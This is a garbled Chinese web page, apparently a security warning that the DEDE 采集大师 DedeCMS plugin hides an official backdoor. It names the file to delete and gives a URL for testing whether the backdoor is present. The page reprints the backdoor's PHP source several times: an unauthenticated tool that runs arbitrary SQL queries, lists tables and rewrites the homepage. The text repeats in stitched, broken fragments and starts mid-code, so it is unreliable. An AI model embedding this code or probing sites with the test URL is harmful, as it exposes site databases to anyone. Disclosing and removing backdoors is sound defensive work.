$row2[1]; echo "<xmp>".trim($ctinfo)."</xmp>"; } exit(); } if($dopost=="index") { require_once(DEDEINC.'/arc.partview.class.php'); $envs = $_sys_globals = array(); $envs['aid'] = 0; $pv = new PartView(); $row = $pv->dsql->GetOne('Select * From `#@__homepageset`'); $templet = str_replace("{style}",$cfg_df_style,$row['templet']); $homeFile = dirname(__FILE__).'/'.$row['position']; $homeFile = str_replace("//","/",str_replace("\","/",$homeFile)); $fp = fopen($homeFile,'w') or die("无法更新网站主页到:$homeFile 位置"); fclose($fp); $tpl = $cfg_basedir.$cfg_templets_dir.'/'.$templet; $pv->SetTemplet($tpl); $pv->SaveToHtml($homeFile); $pv->Close(); echo "成功更新首页!"; exit(); } else if($dopost=="query") { $sqlquery = trim(stripslashes($sqlquery)); if(eregi("drop(.*)table",$sqlquery) ||eregi("drop(.*)database",$sqlquery)) { echo "<span style='font-size:10pt'>删除'数据表'或'数据库'的语句不允许在这里执行。</span>"; exit(); } if(eregi("^select ",$sqlquery)) { $dsql->SetQuery($sqlquery); $dsql->Execute(); if($dsql->GetTotalRow()<=0) { echo "运行SQL:{$sqlquery},无返回记录!"; } else { echo "运行SQL:{$sqlquery},共有".$dsql->GetTotalRow()."条记录,最大返回100条!"; } $j = 0; while($row = $dsql->GetArray()) { $j++; if($j>100) { break; } echo "<hr size=1 width='100%'/>"; echo "记录:$j"; echo "<hr size=1 width='100%'/>"; foreach($row as $k=>$v) { echo "<font color='red'>{$k}:</font>{$v}<br/>\r\n"; } } exit(); } if($querytype==2) { $sqlquery = str_replace("\r","",$sqlquery); $sqls = split(";[ \t]{0,}\n",$sqlquery); $nerrCode = "";$i=0; foreach($sqls as $q) { $q = trim($q); if($q=="") { continue; } $dsql->ExecuteNoneQuery($q); $errCode = trim($dsql->GetError()); if($errCode=="") { $i++; } else { $nerrCode .= "执行: <font color='blue'>$q</font> 出错,错误提示:<font color='red'>".$errCode."</font><br>"; } } echo "成功执行{$i}个SQL语句!<br><br>"; echo $nerrCode; } else { $dsql->ExecuteNoneQuery($sqlquery); $nerrCode = trim($dsql->GetError()); echo "成功执行1个SQL语句!<br><br>"; echo $nerrCode; } exit(); } if($dopost=="view") { ;echo '<html> <head> <meta http-equiv=\'Content-Type\' content=\'text/html; charset=gb2312\'> <title>SQL命令行工具</title> <link href=\'img/base.css\' rel=\'stylesheet\' type=\'text/css\'> </head> <body background=\'img/allbg.gif\' leftmargin=\'8\' topmargin=\'8\'> <table width="98%" border="0" align="center" cellpadding="3" cellspacing="1" bgcolor="#D1DDAA"> <tr> <td height="19" background="img/tbg.gif"> <table width="96%" border="0" cellspacing="1" cellpadding="1"> <tr> <td width="24%"><strong>SQL命令运行器:</strong></td> <td width="76%" align="right"> <b><a href="sys_data.php"><u>数据备份</u></a></b> | <b><a href="sys_data_revert.php"><strong><u>数据还原</u></strong></a></b> </td> </tr> </table> </td> </tr> <tr> <td height="200" bgcolor="#FFFFFF" valign="top"> <table width="100%" border="0" cellspacing="4" cellpadding="2"> <form action="" method="post" name="infoform" target="stafrm"> <input type=\'hidden\' name=\'dopost\' value=\'viewinfo\' /> <tr bgcolor="#F3FBEC"> <td width="15%" height="24" align="center">系统的表信息:</td> <td> <table width="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td width="35%"> <select name="tablename" id="tablename" style="width:100%" size="6"> '; $dsql->SetQuery("Show Tables"); $dsql->Execute('t'); while($row = $dsql->GetArray('t',MYSQL_BOTH)) { $dsql->SetQuery("Select count(*) From ".$row[0]); $dsql->Execute('n'); $row2 = $dsql->GetArray('n',MYSQL_BOTH); $dd = $row2[0]; echo " <option value='".$row[0]."'>".$row[0]."(".$dd.")</option>\r\n"; } ;echo ' </select> </td> <td width="2%"></td> <td width="63%" valign="bottom"> <div style="float:left;margin-right:20px;"> <input type="Submit" name="Submit1" value="优化选中表" class="coolbg np" onClick="this.form.dopost.value=\'opimize\';" /> <br /> <input type="Submit" name="Submit2" value="修复选中表" class="coolbg np" onClick="this.form.dopost.value=\'repair\';" style="margin-top:6px;" /> <br /> <input type="Submit" name="Submit3" value="查看表结构" class="coolbg np" onClick="this.form.dopost.value=\'viewinfo\';" style="margin-top:6px;" /> </div> <div style="float:left"> <input type="Submit" name="Submit5" value="优化全部表" class="coolbg np" onClick="this.form.dopost.value=\'opimizeAll\';" /> <br /> <input type="Submit" name="Submit6" value="修复全部表" class="coolbg np" onClick="this.form.dopost.value=\'repairAll\';" style="margin-top:6px;" /> </div> </td> </tr> </table></td> </tr> <tr> <td height="200" align="center">返回信息:</td> <td> <iframe name="stafrm" frameborder="0" id="stafrm" width="100%" height="100%"></iframe> </td> </tr> </form> <form action="" method="post" name="form1" target="stafrm"> <input type=\'hidden\' name=\'dopost\' value=\'query\'> <tr> <td height="24" colspan="2" bgcolor="#F3FBEC"><strong>运行SQL命令行: <input name="querytype" type="radio" class="np" value="0"> 单行命令(支持简单查询) <input name="querytype" type="radio" class="np" value="2" checked> 多行命令</strong></td> </tr> <tr> <td height="118" colspan="2"> <textarea name="sqlquery" cols="60" rows="10" id="sqlquery" style="width:90%"></textarea> </td> </tr> <tr> <td height="53" align="center"></td> <td> <input name="imageField" type="image" src="img/button_ok.gif" width="60" height="22" border="0" class=\'np\' /> </td> </tr> </form> </table> </td> </tr> </table> </body> </html> ';} ?>去除官方后门方法:安装好采集大师后,请立即删除 include目录下的dedesql.query.php文件,如已经安装过,有可能文件已被改名为arc.sqlquery.class.php,找到并删除即可。此文件可被利用来在无需登录验证的情况下查询网站数据库,并进行更新、删除、查询数据等操作。大家也可以自己测试一下是否如我所说,方法: http://你的域名.com/include/dedesql.query.php.php?dopost=viewinfo 输入以上网址,即可打开后门界面。 说实话,会故意留后门的程序,最好的方法就是别用。这个后门被发现了,天知道下一个所谓的新版本还会不会冒出更多的后门来。此后门文件代码如下: 复制代码 代码如下: <?php require_once(dirname(__FILE__)."/../include/common.inc.php"); if(emptyempty($dopost)) { $dopost = ""; } if($dopost=="rename") { if(rename('dedesql.query.php','arc.sqlquery.class.php')){ echo "成功!"; }else{ echo "失败!"; } exit(); } if($dopost=="viewinfo") { if(emptyempty($tablename)) { echo "没有指定表名!"; } else { $dsql->SetQuery("SHOW CREATE TABLE ".$dsql->dbName.".".$tablename); $dsql->Execute('me'); $row2 = $dsql->GetArray('me',MYSQL_BOTH); $ctinfo = $row2[1]; echo "<xmp>".trim($ctinfo)."</xmp>"; } exit(); } if($dopost=="index") { require_once(DEDEINC.'/arc.partview.class.php'); $envs = $_sys_globals = array(); $envs['aid'] = 0; $pv = new PartView(); $row = $pv->dsql->GetOne('Select * From `#@__homepageset`'); $templet = str_replace("{style}",$cfg_df_style,$row['templet']); $homeFile = dirname(__FILE__).'/'.$row['position']; $homeFile = str_replace("//","/",str_replace("\","/",$homeFile)); $fp = fopen($homeFile,'w') or die("无法更新网站主页到:$homeFile 位置"); fclose($fp); $tpl = $cfg_basedir.$cfg_templets_dir.'/'.$templet; $pv->SetTemplet($tpl); $pv->SaveToHtml($homeFile); $pv->Close(); echo "成功更新首页!"; exit(); } else if($dopost=="query") { $sqlquery = trim(stripslashes($sqlquery)); if(eregi("drop(.*)table",$sqlquery) ||eregi("drop(.*)database",$sqlquery)) { echo "<span style='font-size:10pt'>删除'数据表'或'数据库'的语句不允许在这里执行。</span>"; exit(); } if(eregi("^select ",$sqlquery)) { $dsql->SetQuery($sqlquery); $dsql->Execute(); if($dsql->GetTotalRow()<=0) { echo "运行SQL:{$sqlquery},无返回记录!"; } else { echo "运行SQL:{$sqlquery},共有".$dsql->GetTotalRow()."条记录,最大返回100条!"; } $j = 0; while($row = $dsql->GetArray()) { $j++; if($j>100) { break; } echo "<hr size=1 width='100%'/>"; echo "记录:$j"; echo "<hr size=1 width='100%'/>"; foreach($row as $k=>$v) { echo "<font color='red'>{$k}:</font>{$v}<br/>\r\n"; } } exit(); } if($querytype==2) { $sqlquery = str_replace("\r","",$sqlquery); $sqls = split(";[ \t]{0,}\n",$sqlquery); $nerrCode = "";$i=0; foreach($sqls as $q) { $q = trim($q); if($q=="") { continue; } $dsql->ExecuteNoneQuery($q); $errCode = trim($dsql->GetError()); if($errCode=="") { $i++; } else { $nerrCode .= "执行: <font color='blue'>$q</font> 出错,错误提示:<font color='red'>".$errCode."</font><br>"; } } echo "成功执行{$i}个SQL语句!<br><br>"; echo $nerrCode; } else { $dsql->ExecuteNoneQuery($sqlquery); $nerrCode = trim($dsql->GetError()); echo "成功执行1个SQL语句!<br><br>"; echo $nerrCode; } exit(); } if($dopost=="view") { ;echo '<html> <head> <meta http-equiv=\'Content-Type\' content=\'text/html; charset=gb2312\'> <title>SQL命令行工具</title> <link href=\'img/base.css\' rel=\'stylesheet\' type=\'text/css\'> </head> <body background=\'img/allbg.gif\' leftmargin=\'8\' topmargin=\'8\'> <table width="98%" border="0" align="center" cellpadding="3" cellspacing="1" bgcolor="#D1DDAA"> <tr> <td height="19" background="img/tbg.gif"> <table width="96%" border="0" cellspacing="1" cellpadding="1"> <tr> <td width="24%"><strong>SQL命令运行器:</strong></td> <td width="76%" align="right"> <b><a href="sys_data.php"><u>数据备份</u></a></b> | <b><a href="sys_data_revert.php"><strong><u>数据还原</u></strong></a></b> </td> </tr> </table> </td> </tr> <tr> <td height="200" bgcolor="#FFFFFF" valign="top"> <table width="100%" border="0" cellspacing="4" cellpadding="2"> <form action="" method="post" name="infoform" target="stafrm"> <input type=\'hidden\' name=\'dopost\' value=\'viewinfo\' /> <tr bgcolor="#F3FBEC"> <td width="15%" height="24" align="center">系统的表信息:</td> <td> <table width="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td width="35%"> <select name="tablename" id="tablename" style="width:100%" size="6"> '; $dsql->SetQuery("Show Tables"); $dsql->Execute('t'); while($row = $dsql->GetArray('t',MYSQL_BOTH)) { $dsql->SetQuery("Select count(*) From ".$row[0]); $dsql->Execute('n'); $row2 = $dsql->GetArray('n',MYSQL_BOTH); $dd = $row2[0]; echo " <option value='".$row[0]."'>".$row[0]."(".$dd.")</option>\r\n"; } ;echo ' </select> </td> <td width="2%"></td> <td width="63%" valign="bottom"> <div style="float:left;margin-right:20px;"> <input type="Submit" name="Submit1" value="优化选中表" class="coolbg np" onClick="this.form.dopost.value=\'opimize\';" /> <br /> <input type="Submit" name="Submit2" value="修复选中表" class="coolbg np" onClick="this.form.dopost.value=\'repair\';" style="margin-top:6px;" /> <br /> <input type="Submit" name="Submit3" value="查看表结构" class="coolbg np" onClick="this.form.dopost.value=\'viewinfo\';" style="margin-top:6px;" /> </div> <div style="float:left"> <input type="Submit" name="Submit5" value="优化全部表" class="coolbg np" onClick="this.form.dopost.value=\'opimizeAll\';" /> <br /> <input type="Submit" name="Submit6" value="修复全部表" class="coolbg np" onClick="this.form.dopost.value=\'repairAll\';" style="margin-top:6px;" /> </div> </td> </tr> </table></td> </tr> <tr> <td height="200" align="center">返回信息:</td> <td> <iframe name="stafrm" frameborder="0" id="stafrm" width="100%" height="100%"></iframe> </td> </tr> </form> <form action="" method="post" name="form1" target="stafrm"> <input type=\'hidden\' name=\'dopost\' value=\'query\'> <tr> <td height="24" colspan="2" bgcolor="#F3FBEC"><strong>运行SQL命令行: <input name="querytype" type="radio" class="np" value="0"> 单行命令(支持简单查询) <input name="querytype" type="radio" class="np" value="2" checked> 多行命令</strong></td> </tr> <tr> <td height="118" colspan="2"> <textarea name="sqlquery" cols="60" rows="10" id="sqlquery" style="width:90%"></textarea> </td> </tr> <tr> <td height="53" align="center"></td> <td> <input name="imageField" type="image" src="img/button_ok.gif" width="60" height="22" border="0" class=\'np\' /> </td> </tr> </form> </table> </td> </tr> </table> </body> </html> ';} ?>去除官方后门方法:安装好采集大师后,请立即删除 include目录下的dedesql.query.php文件,如已经安装过,有可能文件已被改名为arc.sqlquery.class.php,找到并删除即可。此文件可被利用来在无需登录验证的情况下查询网站数据库,并进行更新、删除、查询数据等操作。大家也可以自己测试一下是否如我所说,方法: http://你的域名.com/include/dedesql.query.php.php?dopost=viewinfo 输入以上网址,即可打开后门界面。 说实话,会故意留后门的程序,最好的方法就是别用。这个后门被发现了,天知道下一个所谓的新版本还会不会冒出更多的后门来。此后门文件代码如下: 复制代码 代码如下: <?php require_once(dirname(__FILE__)."/../include/common.inc.php"); if(emptyempty($dopost)) { $dopost = ""; } if($dopost=="rename") { if(rename('dedesql.query.php','arc.sqlquery.class.php')){ echo "成功!"; }else{ echo "失败!"; } exit(); } if($dopost=="viewinfo") { if(emptyempty($tablename)) { echo "没有指定表名!"; } else { $dsql->SetQuery("SHOW CREATE TABLE ".$dsql->dbName.".".$tablename); $dsql->Execute('me'); $row2 = $dsql->GetArray('me',MYSQL_BOTH); $ctinfo = $row2[1]; echo "<xmp>".trim($ctinfo)."</xmp>"; } exit(); } if($dopost=="index") { require_once(DEDEINC.'/arc.partview.class.php'); $envs = $_sys_globals = array(); $envs['aid'] = 0; $pv = new PartView(); $row = $pv->dsql->GetOne('Select * From `#@__homepageset`'); $templet = str_replace("{style}",$cfg_df_style,$row['templet']); $homeFile = dirname(__FILE__).'/'.$row['position']; $homeFile = str_replace("//","/",str_replace("\","/",$homeFile)); $fp = fopen($homeFile,'w') or die("无法更新网站主页到:$homeFile 位置"); fclose($fp); $tpl = $cfg_basedir.$cfg_templets_dir.'/'.$templet; $pv->SetTemplet($tpl); $pv->SaveToHtml($homeFile); $pv->Close(); echo "成功更新首页!"; exit(); } else if($dopost=="query") { $sqlquery = trim(stripslashes($sqlquery)); if(eregi("drop(.*)table",$sqlquery) ||eregi("drop(.*)database",$sqlquery)) { echo "<span style='font-size:10pt'>删除'数据表'或'数据库'的语句不允许在这里执行。</span>"; exit(); } if(eregi("^select ",$sqlquery)) { $dsql->SetQuery($sqlquery); $dsql->Execute(); if($dsql->GetTotalRow()<=0) { echo "运行SQL:{$sqlquery},无返回记录!"; } else { echo "运行SQL:{$sqlquery},共有".$dsql->GetTotalRow()."条记录,最大返回100条!"; } $j = 0; while($row = $dsql->GetArray()) { $j++; if($j>100) { break; } echo "<hr size=1 width='100%'/>"; echo "记录:$j"; echo "<hr size=1 width='100%'/>"; foreach($row as $k=>$v) { echo "<font color='red'>{$k}:</font>{$v}<br/>\r\n"; } } exit(); } if($querytype==2) { $sqlquery = str_replace("\r","",$sqlquery); $sqls = split(";[ \t]{0,}\n",$sqlquery); $nerrCode = "";$i=0; foreach($sqls as $q) { $q = trim($q); if($q=="") { continue; } $dsql->ExecuteNoneQuery($q); $errCode = trim($dsql->GetError()); if($errCode=="") { $i++; } else { $nerrCode .= "执行: <font color='blue'>$q</font> 出错,错误提示:<font color='red'>".$errCode."</font><br>"; } } echo "成功执行{$i}个SQL语句!<br><br>"; echo $nerrCode; } else { $dsql->ExecuteNoneQuery($sqlquery); $nerrCode = trim($dsql->GetError()); echo "成功执行1个SQL语句!<br><br>"; echo $nerrCode; } exit(); } if($dopost=="view") { ;echo '<html> <head> <meta http-equiv=\'Content-Type\' content=\'text/html; charset=gb2312\'> <title>SQL命令行工具</title> <link href=\'img/base.css\' rel=\'stylesheet\' type=\'text/css\'> </head> <body background=\'img/allbg.gif\' leftmargin=\'8\' topmargin=\'8\'> <table width="98%" border="0" align="center" cellpadding="3" cellspacing="1" bgcolor="#D1DDAA"> <tr> <td height="19" background="img/tbg.gif"> <table width="96%" border="0" cellspacing="1" cellpadding="1"> <tr> <td width="24%"><strong>SQL命令运行器:</strong></td> <td width="76%" align="right"> <b><a href="sys_data.php"><u>数据备份</u></a></b> | <b><a href="sys_data_revert.php"><strong><u>数据还原</u></strong></a></b> </td> </tr> </table> </td> </tr> <tr> <td height="200" bgcolor="#FFFFFF" valign="top"> <table width="100%" border="0" cellspacing="4" cellpadding="2"> <form action="" method="post" name="infoform" target="stafrm"> <input type=\'hidden\' name=\'dopost\' value=\'viewinfo\' /> <tr bgcolor="#F3FBEC"> <td width="15%" height="24" align="center">系统的表信息:</td> <td> <table width="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td width="35%"> <select name="tablename" id="tablename" style="width:100%" size="6"> '; $dsql->SetQuery("Show Tables"); $dsql->Execute('t'); while($row = $dsql->GetArray('t',MYSQL_BOTH)) { $dsql->SetQuery("Select count(*) From ".$row[0]); $dsql->Execute('n'); $row2 = $dsql->GetArray('n',MYSQL_BOTH); $dd = $row2[0]; echo " <option value='".$row[0]."'>".$row[0]."(".$dd.")</option>\r\n"; } ;echo ' </select> </td> <td width="2%"></td> <td width="63%" valign="bottom"> <div style="float:left;margin-right:20px;"> <input type="Submit" name="Submit1" value="优化选中表" class="coolbg np" onClick="this.form.dopost.value=\'opimize\';" /> <br /> <input type="Submit" name="Submit2" value="修复选中表" class="coolbg np" onClick="this.form.dopost.value=\'repair\';" style="margin-top:6px;" /> <br /> <input type="Submit" name="Submit3" value="查看表结构" class="coolbg np" onClick="this.form.dopost.value=\'viewinfo\';" style="margin-top:6px;" /> </div> <div style="float:left"> <input type="Submit" name="Submit5" value="优化全部表" class="coolbg np" onClick="this.form.dopost.value=\'opimizeAll\';" /> <br /> <input type="Submit" name="Submit6" value="修复全部表" class="coolbg np" onClick="this.form.dopost.value=\'repairAll\';" style="margin-top:6px;" /> </div> </td> </tr> </table></td> </tr> <tr> <td height="200" align="center">返回信息:</td> <td> <iframe name="stafrm" frameborder="0" id="stafrm" width="100%" height="100%"></iframe> </td> </tr> </form> <form action="" method="post" name="form1" target="stafrm"> <input type=\'hidden\' name=\'dopost\' value=\'query\'> <tr> <td height="24" colspan="2" bgcolor="#F3FBEC"><strong>运行SQL命令行: <input name="querytype" type="radio" class="np" value="0"> 单行命令(支持简单查询) <input name="querytype" type="radio" class="np" value="2" checked> 多行命令</strong></td> </tr> <tr> <td height="118" colspan="2"> <textarea name="sqlquery" cols="60" rows="10" id="sqlquery" style="width:90%"></textarea> </td> </tr> <tr> <td height="53" align="center"></td> <td> <input name="imageField" type="image" src="img/button_ok.gif" width="60" height="22" border="0" class=\'np\' /> </td> </tr> </form> </table> </td> </tr> </table> </body> </html> ';} ?>去除官方后门方法:安装好采集大师后,请立即删除 include目录下的dedesql.query.php文件,如已经安装过,有可能文件已被改名为arc.sqlquery.class.php,找到并删除即可。此文件可被利用来在无需登录验证的情况下查询网站数据库,并进行更新、删除、查询数据等操作。大家也可以自己测试一下是否如我所说,方法: http://你的域名.com/include/dedesql.query.php.php?dopost=viewinfo 输入以上网址,即可打开后门界面。 说实话,会故意留后门的程序,最好的方法就是别用。这个后门被发现了,天知道下一个所谓的新版本还会不会冒出更多的后门来。此后门文件代码如下: 复制代码 代码如下: <?php require_once(dirname(__FILE__)."/../include/common.inc.php"); if(emptyempty($dopost)) { $dopost = ""; } if($dopost=="rename") { if(rename('dedesql.query.php','arc.sqlquery.class.php')){ echo "成功!"; }else{ echo "失败!"; } exit(); } if($dopost=="viewinfo") { if(emptyempty($tablename)) { echo "没有指定表名!"; } else { $dsql->SetQuery("SHOW CREATE TABLE ".$dsql->dbName.".".$tablename); $dsql->Execute('me'); $row2 = $dsql->GetArray('me',MYSQL_BOTH); $ctinfo = $row2[1]; echo "<xmp>".trim($ctinfo)."</xmp>"; } exit(); } if($dopost=="index") { require_once(DEDEINC.'/arc.partview.class.php'); $envs = $_sys_globals = array(); $envs['aid'] = 0; $pv = new PartView(); $row = $pv->dsql->GetOne('Select * From `#@__homepageset`'); $templet = str_replace("{style}",$cfg_df_style,$row['templet']); $homeFile = dirname(__FILE__).'/'.$row['position']; $homeFile = str_replace("//","/",str_replace("\","/",$homeFile)); $fp = fopen($homeFile,'w') or die("无法更新网站主页到:$homeFile 位置"); fclose($fp); $tpl = $cfg_basedir.$cfg_templets_dir.'/'.$templet; $pv->SetTemplet($tpl); $pv->SaveToHtml($homeFile); $pv->Close(); echo "成功更新首页!"; exit(); } else if($dopost=="query") { $sqlquery = trim(stripslashes($sqlquery)); if(eregi("drop(.*)table",$sqlquery) ||eregi("drop(.*)database",$sqlquery)) { echo "<span style='font-size:10pt'>删除'数据表'或'数据库'的语句不允许在这里执行。</span>"; exit(); } if(eregi("^select ",$sqlquery)) { $dsql->SetQuery($sqlquery); $dsql->Execute(); if($dsql->GetTotalRow()<=0) { echo "运行SQL:{$sqlquery},无返回记录!"; } else { echo "运行SQL:{$sqlquery},共有".$dsql->GetTotalRow()."条记录,最大返回100条!"; } $j = 0; while($row = $dsql->GetArray()) { $j++; if($j>100) { break; } echo "<hr size=1 width='100%'/>"; echo "记录:$j"; echo "<hr size=1 width='100%'/>"; foreach($row as $k=>$v) { echo "<font color='red'>{$k}:</font>{$v}<br/>\r\n"; } } exit(); } if($querytype==2) { $sqlquery = str_replace("\r","",$sqlquery); $sqls = split(";[ \t]{0,}\n",$sqlquery); $nerrCode = "";$i=0; foreach($sqls as $q) { $q = trim($q); if($q=="") { continue; } $dsql->ExecuteNoneQuery($q); $errCode = trim($dsql->GetError()); if($errCode=="") { $i++; } else { $nerrCode .= "执行: <font color='blue'>$q</font> 出错,错误提示:<font color='red'>".$errCode."</font><br>"; } } echo "成功执行{$i}个SQL语句!<br><br>"; echo $nerrCode; } else { $dsql->ExecuteNoneQuery($sqlquery); $nerrCode = trim($dsql->GetError()); echo "成功执行1个SQL语句!<br><br>"; echo $nerrCode; } exit(); } if($dopost=="view") { ;echo '<html> <head> <meta http-equiv=\'Content-Type\' content=\'text/html; charset=gb2312\'> <title>SQL命令行工具</title> <link href=\'img/base.css\' rel=\'stylesheet\' type=\'text/css\'> </head> <body background=\'img/allbg.gif\' leftmargin=\'8\' topmargin=\'8\'> <table width="98%" border="0" align="center" cellpadding="3" cellspacing="1" bgcolor="#D1DDAA"> <tr> <td height="19" background="img/tbg.gif"> <table width="96%" border="0" cellspacing="1" cellpadding="1"> <tr> <td width="24%"><strong>SQL命令运行器:</strong></td> <td width="76%" align="right"> <b><a href="sys_data.php"><u>数据备份</u></a></b> | <b><a href="sys_data_revert.php"><strong><u>数据还原</u></strong></a></b> </td> </tr> </table> </td> </tr> <tr> <td height="200" bgcolor="#FFFFFF" valign="top"> <table width="100%" border="0" cellspacing="4" cellpadding="2"> <form action="" method="post" name="infoform" target="stafrm"> <input type=\'hidden\' name=\'dopost\' value=\'viewinfo\' /> <tr bgcolor="#F3FBEC"> <td width="15%" height="24" align="center">系统的表信息:</td> <td> <table width="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td width="35%"> <select name="tablename" id="tablename" style="width:100%" size="6"> '; $dsql->SetQuery("Show Tables"); $dsql->Execute('t'); while($row = $dsql->GetArray('t',MYSQL_BOTH)) { $dsql->SetQuery("Select count(*) From ".$row[0]); $dsql->Execute('n'); $row2 = $dsql->GetArray('n',MYSQL_BOTH); $dd = $row2[0]; echo " <option value='".$row[0]."'>".$row[0]."(".$dd.")</option>\r\n"; } ;echo ' </select> </td> <td width="2%"></td> <td width="63%" valign="bottom"> <div style="float:left;margin-right:20px;"> <input type="Submit" name="Submit1" value="优化选中表" class="coolbg np" onClick="this.form.dopost.value=\'opimize\';" /> <br /> <input type="Submit" name="Submit2" value="修复选中表" class="coolbg np" onClick="this.form.dopost.value=\'repair\';" style="margin-top:6px;" /> <br /> <input type="Submit" name="Submit3" value="查看表结构" class="coolbg np" onClick="this.form.dopost.value=\'viewinfo\';" style="margin-top:6px;" /> </div> <div style="float:left"> <input type="Submit" name="Submit5" value="优化全部表" class="coolbg np" onClick="this.form.dopost.value=\'opimizeAll\';" /> <br /> <input type="Submit" name="Submit6" value="修复全部表" class="coolbg np" onClick="this.form.dopost.value=\'repairAll\';" style="margin-top:6px;" /> </div> </td> </tr> </table></td> </tr> <tr> <td height="200" align="center">返回信息:</td> <td> <iframe name="stafrm" frameborder="0" id="stafrm" width="100%" height="100%"></iframe> </td> </tr> </form> <form action="" method="post" name="form1" target="stafrm"> <input type=\'hidden\' name=\'dopost\' value=\'query\'> <tr> <td height="24" colspan="2" bgcolor="#F3FBEC"><strong>运行SQL命令行: <input name="querytype" type="radio" class="np" value="0"> 单行命令(支持简单查询) <input name="querytype" type="radio" class="np" value="2" checked> 多行命令</strong></td> </tr> <tr> <td height="118" colspan="2"> <textarea name="sqlquery" cols="60" rows="10" id="sqlquery" style="width:90%"></textarea> </td> </tr> <tr> <td height="53" align="center"></td> <td> <input name="imageField" type="image" src="img/button_ok.gif" width="60" height="22" border="0" class=\'np\' /> </td> </tr> </form> </table> </td> </tr> </table> </body> </html> ';} ?>DEDE采集大师官方留后门的删除办法去除官方后门方法:安装好采集大师后,请立即删除 include目录下的dedesql.query.php文件,如已经安装过,有可能文件已被改名为arc.sqlquery.class.php,找到并删除即可。此文件可被利用来在无需登录验证的情况下查询网站数据库,并进行更新、删除、查询数据等操作。大家也可以自己测试一下是否如我所说,方法: http://你的域名.com/include/dedesql.query.php.php?dopost=viewinfo 输入以上网址,即可打开后门界面。 说实话,会故意留后门的程序,最好的方法就是别用。这个后门被发现了,天知道下一个所谓的新版本还会不会冒出更多的后门来。此后门文件代码如下: 复制代码 代码如下: <?php require_once(dirname(__FILE__)."/../include/common.inc.php"); if(emptyempty($dopost)) { $dopost = ""; } if($dopost=="rename") { if(rename('dedesql.query.php','arc.sqlquery.class.php')){ echo "成功!"; }else{ echo "失败!"; } exit(); } if($dopost=="viewinfo") { if(emptyempty($tablename)) { echo "没有指定表名!"; } else { $dsql->SetQuery("SHOW CREATE TABLE ".$dsql->dbName.".".$tablename); $dsql->Execute('me'); $row2 = $dsql->GetArray('me',MYSQL_BOTH); $ctinfo = $row2[1]; echo "<xmp>".trim($ctinfo)."</xmp>"; } exit(); } if($dopost=="index") { require_once(DEDEINC.'/arc.partview.class.php'); $envs = $_sys_globals = array(); $envs['aid'] = 0; $pv = new PartView(); $row = $pv->dsql->GetOne('Select * From `#@__homepageset`'); $templet = str_replace("{style}",$cfg_df_style,$row['templet']); $homeFile = dirname(__FILE__).'/'.$row['position']; $homeFile = str_replace("//","/",str_replace("\","/",$homeFile)); $fp = fopen($homeFile,'w') or die("无法更新网站主页到:$homeFile 位置"); fclose($fp); $tpl = $cfg_basedir.$cfg_templets_dir.'/'.$templet; $pv->SetTemplet($tpl); $pv->SaveToHtml($homeFile); $pv->Close(); echo "成功更新首页!"; exit(); } else if($dopost=="query") { $sqlquery = trim(stripslashes($sqlquery)); if(eregi("drop(.*)table",$sqlquery) ||eregi("drop(.*)database",$sqlquery)) { echo "<span style='font-size:10pt'>删除'数据表'或'数据库'的语句不允许在这里执行。</span>"; exit(); } if(eregi("^select ",$sqlquery)) { $dsql->SetQuery($sqlquery); $dsql->Execute(); if($dsql->GetTotalRow()<=0) { echo "运行SQL:{$sqlquery},无返回记录!"; } else { echo "运行SQL:{$sqlquery},共有".$dsql->GetTotalRow()."条记录,最大返回100条!"; } $j = 0; while($row = $dsql->GetArray()) { $j++; if($j>100) { break; } echo "<hr size=1 width='100%'/>"; echo "记录:$j"; echo "<hr size=1 width='100%'/>"; foreach($row as $k=>$v) { echo "<font color='red'>{$k}:</font>{$v}<br/>\r\n"; } } exit(); } if($querytype==2) { $sqlquery = str_replace("\r","",$sqlquery); $sqls = split(";[ \t]{0,}\n",$sqlquery); $nerrCode = "";$i=0; foreach($sqls as $q) { $q = trim($q); if($q=="") { continue; } $dsql->ExecuteNoneQuery($q); $errCode = trim($dsql->GetError()); if($errCode=="") { $i++; } else { $nerrCode .= "执行: <font color='blue'>$q</font> 出错,错误提示:<font color='red'>".$errCode."</font><br>"; } } echo "成功执行{$i}个SQL语句!<br><br>"; echo $nerrCode; } else { $dsql->ExecuteNoneQuery($sqlquery); $nerrCode = trim($dsql->GetError()); echo "成功执行1个SQL语句!<br><br>"; echo $nerrCode; } exit(); } if($dopost=="view") { ;echo '<html> <head> <meta http-equiv=\'Content-Type\' content=\'text/html; charset=gb2312\'> <title>SQL命令行工具</title> <link href=\'img/base.css\' rel=\'stylesheet\' type=\'text/css\'> </head> <body background=\'img/allbg.gif\' leftmargin=\'8\' topmargin=\'8\'> <table width="98%" border="0" align="center" cellpadding="3" cellspacing="1" bgcolor="#D1DDAA"> <tr> <td height="19" background="img/tbg.gif"> <table width="96%" border="0" cellspacing="1" cellpadding="1"> <tr> <td width="24%"><strong>SQL命令运行器:</strong></td> <td width="76%" align="right"> <b><a href="sys_data.php"><u>数据备份</u></a></b> | <b><a href="sys_data_revert.php"><strong><u>数据还原</u></strong></a></b> </td> </tr> </table> </td> </tr> <tr> <td height="200" bgcolor="#FFFFFF" valign="top"> <table width="100%" border="0" cellspacing="4" cellpadding="2"> <form action="" method="post" name="infoform" target="stafrm"> <input type=\'hidden\' name=\'dopost\' value=\'viewinfo\' /> <tr bgcolor="#F3FBEC"> <td width="15%" height="24" align="center">系统的表信息:</td> <td> <table width="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td width="35%"> <select name="tablename" id="tablename" style="width:100%" size="6"> '; $dsql->SetQuery("Show Tables"); $dsql->Execute('t'); while($row = $dsql->GetArray('t',MYSQL_BOTH)) { $dsql->SetQuery("Select count(*) From ".$row[0]); $dsql->Execute('n'); $row2 = $dsql->GetArray('n',MYSQL_BOTH); $dd = $row2[0]; echo " <option value='".$row[0]."'>".$row[0]."(".$dd.")</option>\r\n"; } ;echo ' </select> </td> <td width="2%"></td> <td width="63%" valign="bottom"> <div style="float:left;margin-right:20px;"> <input type="Submit" name="Submit1" value="优化选中表" class="coolbg np" onClick="this.form.dopost.value=\'opimize\';" /> <br /> <input type="Submit" name="Submit2" value="修复选中表" class="coolbg np" onClick="this.form.dopost.value=\'repair\';" style="margin-top:6px;" /> <br /> <input type="Submit" name="Submit3" value="查看表结构" class="coolbg np" onClick="this.form.dopost.value=\'viewinfo\';" style="margin-top:6px;" /> </div> <div style="float:left"> <input type="Submit" 